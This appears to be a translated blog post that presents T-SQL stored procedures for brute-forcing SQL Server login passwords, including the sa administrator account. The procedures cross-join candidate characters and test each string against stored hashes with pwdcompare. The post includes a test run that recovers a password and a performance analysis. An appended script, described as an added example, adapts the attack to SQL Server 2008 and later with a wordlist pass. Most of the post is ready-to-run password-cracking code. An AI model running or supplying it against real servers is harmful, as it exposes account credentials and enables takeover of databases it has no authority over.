Cracking the MSSQL sa password with a stored procedure

Source: Internet
Author: User
Tags: mssql

The code below brute-forces SQL Server login names and passwords, including the password of the administrator account sa.

Stored procedures for cracking the SQL Server sa password circulate on the Internet. They work by brute force against the logins and passwords stored in MSSQL, including the password of the administrator account sa. I made a small modification to someone else's code and add some performance analysis.

The core idea is this: login names and password hashes are stored in the table master.dbo.sysxlogins, and the undocumented function pwdcompare reports whether a clear-text candidate matches a stored hash. The procedure therefore builds a table of candidate characters, cross-joins it with itself once per password position to enumerate every candidate string of a given length, and calls pwdcompare on each candidate until a login's hash matches. Two practical limits: both procedures only apply to SQL Server 2000, because master.dbo.sysxlogins and its xstatus flags were removed in SQL Server 2005, and reading the password column requires a highly privileged (sysadmin) login, so this is an offline audit of hashes you already have access to, not a network attack. After some analysis I modified part of the code; the code before and after the changes follows.

The stored procedure for SQL Server sa password cracking as found on the Internet:

create proc p_GetPassword
    @username sysname = null,   -- login name; if omitted, every login is tried
    @pwdlen   int     = 2       -- maximum password length to try (default: 2 characters or fewer)
as
-- @pwdlen is used as "extra rounds after the first"; a 1-character round always runs
set @pwdlen = case when isnull(@pwdlen, 0) < 1 then 1 else @pwdlen - 1 end

-- candidate symbols: every byte value 0..254 (255 rows), so char(id) covers the whole code page
select top 255 id = identity(int, 0, 1) into #t from syscolumns
alter table #t add constraint pk_#t primary key (id)

-- one row per SQL Server login (srvid is null excludes remote-server login mappings)
select name, password
    , type   = case when xstatus & 2048 = 2048 then 1 else 0 end   -- flag passed as pwdcompare's 3rd argument
    , jm     = case when password is null then 1 else 0 end        -- 1 = done (a null password counts as cracked)
    , pwdstr = cast('' as sysname)                                 -- recovered password
    , pwd    = cast('' as varchar(8000))                           -- the same, as comma-separated ASCII codes
into #pwd
from master.dbo.sysxlogins a
where srvid is null
    and name = isnull(@username, name)

declare @s1 varchar(8000), @s2 varchar(8000), @s3 varchar(8000)
declare @l int

-- round 1: one copy of #t (alias aa), so the candidates are single characters
select @l = 0
    , @s1 = 'char(aa.id)'
    , @s2 = 'cast(aa.id as varchar)'
    , @s3 = ',#t aa'
exec('
update pwd set jm = 1, pwdstr = ' + @s1 + '
    , pwd = ' + @s2 + '
from #pwd pwd' + @s3 + '
where pwd.jm = 0
    and pwdcompare(' + @s1 + ', pwd.password, pwd.type) = 1
')

-- every further round cross-joins one more copy of #t (aliases ab, ac, ...), i.e. one more character
while exists (select 1 from #pwd where jm = 0 and @l < @pwdlen)
begin
    select @l = @l + 1
        , @s1 = @s1 + '+char(' + char(@l / 26 + 97) + char(@l % 26 + 97) + '.id)'
        , @s2 = @s2 + '+'',''+cast(' + char(@l / 26 + 97) + char(@l % 26 + 97) + '.id as varchar)'
        , @s3 = @s3 + ',#t ' + char(@l / 26 + 97) + char(@l % 26 + 97)
    exec('
    update pwd set jm = 1, pwdstr = ' + @s1 + '
        , pwd = ' + @s2 + '
    from #pwd pwd' + @s3 + '
    where pwd.jm = 0
        and pwdcompare(' + @s1 + ', pwd.password, pwd.type) = 1
    ')
end

select [user name] = name, [password] = pwdstr, [password ascii] = pwd
from #pwd
go

Here is my revised code. Instead of all 255 byte values it enumerates a 66-character set of ordinary keyboard characters built from a string, stores one character per row in #t, and records how many rows each round had to evaluate so the cost can be analysed afterwards. Note that the set contains only upper-case letters: this relies on SQL Server 2000 also storing a hash of the upper-cased password, which pwdcompare uses when its third argument is 1. For a login whose flag is 0 the comparison is case-sensitive, and a password containing lower-case letters will not be found with this set unless the commented-out lower-case line is enabled.

create proc p_GetPassword2
    @username sysname = null,   -- login name; if omitted, every login is tried
    @pwdlen   int     = 2       -- maximum password length to try (default: 2 characters or fewer)
as
set nocount on

if object_id(N'tempdb..#t') is not null
    drop table #t
if object_id(N'tempdb..#pwd') is not null
    drop table #pwd

-- @pwdlen is used as "extra rounds after the first"; a 1-character round always runs
set @pwdlen = case when isnull(@pwdlen, 0) < 1 then 1 else @pwdlen - 1 end

-- candidate character set: 66 ordinary keyboard characters (upper case, digits, punctuation)
declare @ss varchar(256)
--select @ss = '123456789'
select @ss = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
select @ss = @ss + '0123456789-=[]\;,./'
select @ss = @ss + '~!@#$%^&*()_+{}|:"<>?'
--select @ss = @ss + 'abcdefghijklmnopqrstuvwxyz'

-- one row per candidate character; the binary collation keeps the primary key from
-- rejecting 'a' as a duplicate of 'A' if lower case is added on a case-insensitive server
create table #t (c char(1) collate Latin1_General_BIN not null)
alter table #t add constraint pk_#t primary key clustered (c)
declare @index int
select @index = 1
while @index <= len(@ss)
begin
    insert #t select substring(@ss, @index, 1)
    select @index = @index + 1
end

-- one row per SQL Server login
select name, password
    , type   = case when xstatus & 2048 = 2048 then 1 else 0 end   -- flag passed as pwdcompare's 3rd argument
    , jm     = case when password is null then 1 else 0 end        -- 1 = done (a null password counts as cracked)
    , pwdstr = cast('' as sysname)                                 -- recovered password
    , pwd    = cast('' as varchar(8000))                           -- the same, as comma-separated ASCII codes
    , times  = cast('' as varchar(8000))                           -- rows evaluated per round
into #pwd
from master.dbo.sysxlogins a
where srvid is null
    and name = isnull(@username, name)

declare @s1 varchar(8000), @s2 varchar(8000), @s3 varchar(8000), @stimes varchar(8000)
declare @l int, @t bigint

-- rows the first round has to evaluate: logins x |charset|^1; len() is cast to bigint
-- because power() returns its first argument's type and int overflows from 66^6 onwards
select @t = count(1) * power(cast(len(@ss) as bigint), 1) from #pwd

-- round 1: one copy of #t (alias aa), so the candidates are single characters
select @l = 0
    , @s1 = 'aa.c'
    , @s2 = 'cast(ascii(aa.c) as varchar)'
    , @s3 = ',#t aa'
    , @stimes = '1th,' + cast(@t as varchar) + 'rows'

exec('
update pwd set jm = 1, pwdstr = ' + @s1 + '
    , pwd = ' + @s2 + '
    , times = ''' + @stimes + '''
from #pwd pwd' + @s3 + '
where pwd.jm = 0
    and pwdcompare(' + @s1 + ', pwd.password, pwd.type) = 1
')

-- every further round cross-joins one more copy of #t (aliases ab, ac, ...), i.e. one more character
while exists (select 1 from #pwd where jm = 0 and @l < @pwdlen)
begin
    select @l = @l + 1
    select @t = count(1) * power(cast(len(@ss) as bigint), @l + 1) from #pwd
    print @t

    select @s1 = @s1 + '+' + char(@l / 26 + 97) + char(@l % 26 + 97) + '.c'
        , @s2 = @s2 + '+'',''+cast(ascii(' + char(@l / 26 + 97) + char(@l % 26 + 97) + '.c) as varchar)'
        , @s3 = @s3 + ',#t ' + char(@l / 26 + 97) + char(@l % 26 + 97)
        , @stimes = @stimes + ';' + cast(@l + 1 as varchar) + 'th,' + cast(@t as varchar) + 'rows'

    exec('
    update pwd set jm = 1, pwdstr = ' + @s1 + '
        , pwd = ' + @s2 + '
        , times = ''' + @stimes + '''
    from #pwd pwd' + @s3 + '
    where pwd.jm = 0
        and pwdcompare(' + @s1 + ', pwd.password, pwd.type) = 1
    ')
end

select [user name] = name, [password] = pwdstr, [password ascii] = pwd, [query rounds and rows] = times
from #pwd

if object_id(N'tempdb..#t') is not null
    drop table #t
if object_id(N'tempdb..#pwd') is not null
    drop table #pwd
go

I tested it as follows:

exec p_GetPassword2 'B', 6

user name   password   password ascii   query rounds and rows
B           123        49,50,51         1th,66rows;2th,4356rows;3th,287496rows

Performance analysis:

In this example the bigint counter @t records how many candidate rows a round has to push through pwdcompare, so its maximum value, 9223372036854775807, is a convenient upper bound on the size of search space the procedure can even count, let alone finish.

The cost of cracking a password grows exponentially with its length: the number of rows evaluated is (number of logins being attacked) x (number of characters in the candidate set) ^ (maximum password length), and that product has to stay below max(bigint):

The original procedure uses all 255 byte values 0-254 as candidates, roughly 256, so in principle it can cover passwords of up to 7 characters: 256^7 = 2^56 < max(bigint) = 2^63 - 1, while 256^8 = 2^64 already exceeds it.
My modified procedure uses 66 ordinary keyboard characters, so in principle it can cover up to 10 characters: 66^10 is about 1.6 x 10^18 < max(bigint), while 66^11 exceeds it.
If the password is known to consist of the 10 digits only, in principle it can cover up to 18 characters: 10^18 < max(bigint), while 10^19 already exceeds it.

In practice the limit is time rather than the counter: the 3-character round for a single login already costs 287,496 pwdcompare calls (see the test above), and every additional character multiplies that by 66.
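The same check on a current SQL Server, as an added example that is not part of the original post: master.dbo.sysxlogins and its xstatus flag no longer exist after SQL Server 2000, but sys.sql_logins exposes password_hash and PWDCOMPARE is now a documented function whose third argument is ignored, so the approach above carries over unchanged. The script below targets SQL Server 2008 or later, enumerates a 36-character set (digits and lower-case letters) to a fixed depth of 3 with the cross joins written out instead of generated with EXEC, and runs a short wordlist first. The character set, depth cap and wordlist are assumptions chosen for illustration; the script reads password hashes, so run it only as a sysadmin on a server you are authorised to audit.

```sql
-- Added example (not from the original post): weak-password audit of SQL logins on
-- SQL Server 2008 or later via sys.sql_logins and the documented PWDCOMPARE().
-- Run as sysadmin on a server you are authorised to audit.
-- The charset, wordlist and length cap are assumptions made for this example.
SET NOCOUNT ON;

DECLARE @charset varchar(100) = '0123456789abcdefghijklmnopqrstuvwxyz';   -- assumed: 36 symbols
DECLARE @maxlen  int          = 3;                                         -- assumed depth cap

-- 1. Symbol table, one row per character. The binary collation lets 'a' and 'A'
--    coexist under the primary key if both are ever listed in @charset.
DECLARE @c TABLE (ch char(1) COLLATE Latin1_General_BIN NOT NULL PRIMARY KEY);
DECLARE @i int = 1;
WHILE @i <= LEN(@charset)
BEGIN
    INSERT @c (ch) VALUES (SUBSTRING(@charset, @i, 1));
    SET @i += 1;
END;

-- 2. Targets: enabled SQL logins only (Windows logins have no hash to compare).
DECLARE @target TABLE (name sysname NOT NULL, password_hash varbinary(256) NULL,
                       found varchar(128) NULL, how varchar(20) NULL);
INSERT @target (name, password_hash)
SELECT name, password_hash FROM sys.sql_logins WHERE is_disabled = 0;

-- 3. Wordlist pass first: it is cheap and catches the passwords that really get used.
--    The list is constructed for this example; '' covers the classic blank sa password.
DECLARE @words TABLE (w varchar(128) NOT NULL);
INSERT @words (w) VALUES ('sa'), ('password'), ('Password1'), ('123456'), ('admin'), ('');
UPDATE t SET found = w.w, how = 'wordlist'
FROM @target t JOIN @words w ON PWDCOMPARE(w.w, t.password_hash) = 1
WHERE t.found IS NULL;

-- 4. Exhaustive pass, lengths 1..3. Each extra length is one more cross join with @c,
--    which is exactly the statement the original procedure assembles with EXEC.
UPDATE t SET found = a.ch, how = 'brute/1'
FROM @target t CROSS JOIN @c a
WHERE t.found IS NULL AND PWDCOMPARE(a.ch, t.password_hash) = 1;

IF @maxlen >= 2
UPDATE t SET found = a.ch + b.ch, how = 'brute/2'
FROM @target t CROSS JOIN @c a CROSS JOIN @c b
WHERE t.found IS NULL AND PWDCOMPARE(a.ch + b.ch, t.password_hash) = 1;

IF @maxlen >= 3
UPDATE t SET found = a.ch + b.ch + c.ch, how = 'brute/3'
FROM @target t CROSS JOIN @c a CROSS JOIN @c b CROSS JOIN @c c
WHERE t.found IS NULL AND PWDCOMPARE(a.ch + b.ch + c.ch, t.password_hash) = 1;

-- 5. Report. Candidates tried per login with the assumed set: 6 words + 36 + 1,296 + 46,656 = 47,994.
--    The bigint cast mirrors the overflow fix in the revised procedure above.
SELECT name, how, found,
       candidates_per_login = (SELECT COUNT(*) FROM @words)
                            + POWER(CAST(LEN(@charset) AS bigint), 1)
                            + POWER(CAST(LEN(@charset) AS bigint), 2)
                            + POWER(CAST(LEN(@charset) AS bigint), 3)
FROM @target
ORDER BY CASE WHEN found IS NULL THEN 1 ELSE 0 END, name;
```

A caller without sufficient privilege either does not see the rows of sys.sql_logins or gets NULL hashes, and PWDCOMPARE against NULL never returns 1, so an empty result from a low-privilege account proves nothing about password strength. Each extra character multiplies the exhaustive cost by the size of the set, the same exponential the performance analysis above describes; for anything beyond a few characters, export the hashes and use an offline password-cracking tool rather than a cross join inside the engine.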
